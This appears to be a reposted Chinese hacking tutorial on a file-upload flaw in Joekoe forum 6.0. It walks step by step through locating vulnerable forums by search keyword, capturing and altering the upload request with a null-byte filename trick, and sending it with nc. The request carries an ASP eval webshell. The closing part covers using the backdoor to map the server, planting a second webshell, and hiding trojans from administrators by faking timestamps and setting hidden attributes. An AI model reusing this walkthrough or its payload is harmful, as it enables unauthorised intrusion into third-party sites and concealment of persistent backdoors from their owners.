安基网 首页 安全 安全学院 查看内容

乔客论坛惊暴UPfile严重漏洞

2009-2-4 05:37| 投稿: security


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 文/ 勇哥(看完我真是无话可说,for 6.0的漏洞,我真@#@$%$#^&^*&.....)    前一阵动网Upfile...
文/ 勇哥(看完我真是无话可说,for 6.0的漏洞,我真@#@$%$#^&^*&.....)    前一阵动网Upfile.asp文件漏洞真可谓影响深远。把空格(ASC为20H)改成为空(ASC为00H)也就是符串结束符“\0”来成功欺骗计算机,这种提交数据的方式使我深受启发,由此才有此文:乔客6.0的Upload.asp漏洞。同时,也把本篇文章作为的一件最好的生日礼物,献给我最漂亮、最善解人意的女朋友俊俊!    漏洞危害:  1.用户可以随意建目录。    2.用户可以上传任意后缀名的文件。    下面先来看一下在Upload.asp文件中存在的如下代码:if not MyFso.folderExists(up_path) then    set up_path=MyFso.CreateFolder(up_path)end if如果上传目录不存在,会自动创建,这样我们就可以随便建目录了。再看:upfile_name=up_name&"."&upfile_name        upfile.SaveAs up_path&upfile_name可见上传后文件名是:“upfile_name=up_name&"."&upfile_name”,其中Up_name由年、月、日和一个随机数组成,如:2004610173526,而“.”后面的Upfile_name为合法的后缀名,如GIF,本来这是很正常的改名方式,但是计算机在检测字符串时是看是否碰到“\0”字符,如果是,则认为字符串结束了。也就是说我们在构造上传文件名时,只要欺骗计算机,把“2004610173526”文件名改成“2004610173526.asp\0”这样的方式,后面一连串的时间字符我们都可以不要了,从而达到直接将文件名保存为我们定义的文件名的目的。原理是枯燥的,实例才最有趣,下面给大家讲一个详细的利用这个漏洞入侵某论坛的例子。    漏洞利用:    首先在百度里搜索关键字“版本:Joekoe V6.0”,然后会出现好多这样的论坛,我们随便挑一个论坛去注册,然后再打开论坛的任意一个版块如“笑话天地”(http://www.******.com/bbs/forum_list.asp?forum_id=9),点击左上角的“发表新贴”按钮(http://www.******.com/bbs/forum_write.asp?forum_id=9),发新帖子。    上面的准备工作做完后,下面我们就可以正式开始挑战这个论坛了。需要用到的工具有WinSock Expert V0.6 beta 1、UltraEdit、NC、ASP后门和新鲜鸡蛋几只,均可在光盘中找到(咳,鸡蛋是给大家吃的,可别用来扔我,呵呵)。下面我们正式开始:  运行WinSock Expert->点“open process”按钮->打开IExplore.exe进程,选中第二步打开的网页(某某论坛-笑话开地,发表新贴)->点“open”按钮,这样WinSock Expert就可以监听刚才打开的网页的一举一动了。我们的目的是想要抓取数据上传的包并做进一步的修改。  然后使用“上传文件”这一功能,浏览上传我们的ASP后门。我用的是“冰狐浪子微型ASP后门”,成功后再配合“海阳顶端2004”一起发挥作用,效果还不错,大家可以考虑这种配合方式。点击“上传”后,页面会出现“上传失败:文件类型只能为gif、jpg、bmp、swf、rar、zip等格式,返回上一页”,不用理会它,现在我们需要的就是这样的信息。  赶紧到WinSock Expert中提取抓获的有用数据,内容如下:POST /bbs/upload.asp?action=upfile HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*Referer: http://www.******.com/bbs/upload.asp?uppath=forum&upname=&uptext=jk_wordAccept-Language: zh-cnContent-Type: multipart/form-data; boundary=---------------------------7d311f101009cAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: www.******.comContent-Length: 710Connection: Keep-AliveCache-Control: no-cacheCookie: joekoe%5Fonline=onlines=1&login%5Fpassword=fb411be97b3b0d48&guest%5Fname=&iscookies=yes&login%5Fusername=test; ASPSESSIONIDASQQAATR=CNBCLACDOHPJIDDNHLCCICLP -----------------------------7d311f101009cContent-Disposition: form-data; name="up_path" forum-----------------------------7d311f101009cContent-Disposition: form-data; name="up_name" 200473153438-----------------------------7d311f101009cContent-Disposition: form-data; name="up_text" jk_word-----------------------------7d311f101009cContent-Disposition: form-data; name="file_name1"; filename="C:\Xy\temp\dvupfile\binghu.asp"Content-Type: text/html <SCRIPT RUNAT=SERVER LANGUAGE=javascript>eval(Request.form('havebug')+'')</SCRIPT>-----------------------------7d311f101009cContent-Disposition: form-data; name="submit" 点击上传-----------------------------7d311f101009c—   注意你可以将自己抓的包同我的对比,有些地方是不同的,但大体一样,特别要注意最后的“7d311f101009c”后面有个回车,一定要拷贝下来,因为它会影响Content-Length:的长度。再打开UltraEdit,创建一新文件,把第三步用“WinSock Expert”抓的内容复制进去。看过动网上传漏洞分析的朋友都知道,因为在Upload.asp文件中对上传文件的类型做了限制,所以直接上传ASP文件是不行的,我们要把“binghu.asp”文件改成“binghu.gif”。这里的Forum是默认的上传目录,我们可以任意改名,如改成havebug(Content-Length:对应的数字就多了2),也可以改成Forum/../../havebug(Content-Length:对应的数字就多了14),后者是把Havebug建到BBS目录下。这里需要非常小心,因为多一个字母Content-Length的长度就应该增加1,多一个汉字长度应加2。同时,很多网管把这个目录设置成了禁止执行ASP文件,可以利用“../”把地址指向论坛主目录下,总不会有人不让论坛运行吧!  下面是比较细致的工作了:200473153438是上传的文件名,我们可以改成Hacker.asp并在后面加入一个空格,然后再在UltraEdit里按Ctrl+H进入十六进制编辑,将空格符的20改成00,这样两个长度长度正好一样都为12,省下改Content-Length了。最后保存文件名为:qiaoke.txt。  修改好了,我们需要将这个数据提交给服务器,这里所用工具是“瑞士军刀——NC”,黑防的光盘上每期都有,大家赶紧去翻出来吧。命令格式是:nc –vv http://www.******.com 80 <qiaoke.txt很容易就成功了,在CMD下你将会看到这样的提示:<table border=0 height='100%'cellspacing=0 cellpadding=0><tr><td height='100%'><font class=red>上传成功</font>:<a href='upload/havebug/hacker.asp</td></tr></table>简单吧?冰狐浪子微型ASP后门就传到服务器上了!现在直接提交你上传的后门路径吧,不出意外的话,你的后门已经在那里等着你咯!  好了,我不是喜欢废话的人,漏洞分析和利用就说到这里,最后和大家说说后门的利用与隐藏,这是很多朋友最近在黑防论坛上老问的问题。  我上穿的冰狐浪子微型ASP后门,如果直接利用这个后门的“磁盘信息”功能,可以找到论坛的绝对路径(物理路径),如:D:\www\******.com\bbs\upload\forum得到这个路径就意味着你几乎可以把整个站点的结构弄清楚了,对后面的入侵将会带来比较大的帮助。同时,你也可以再利用冰狐浪子微型ASP后门的“写入文件FSO”功能,填好路径写个“海阳顶端2005”上去!  关于后门的隐藏,可以采取这样的办法:先修改本机时间,然后分别编辑两个木马,然后存盘,使木马文件的时间与论坛中文件一致!这样管理员是非常难以发现这个木马的。同时,修改木马文件名,改成与论坛中的文件名相类似,把它放在“backup(论坛备份)”或“images(图片)”目录下,最后再利用Attrib命令给文件加上只读、隐藏属性,相信论坛管理员要找这样的后门就比较困难了!

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部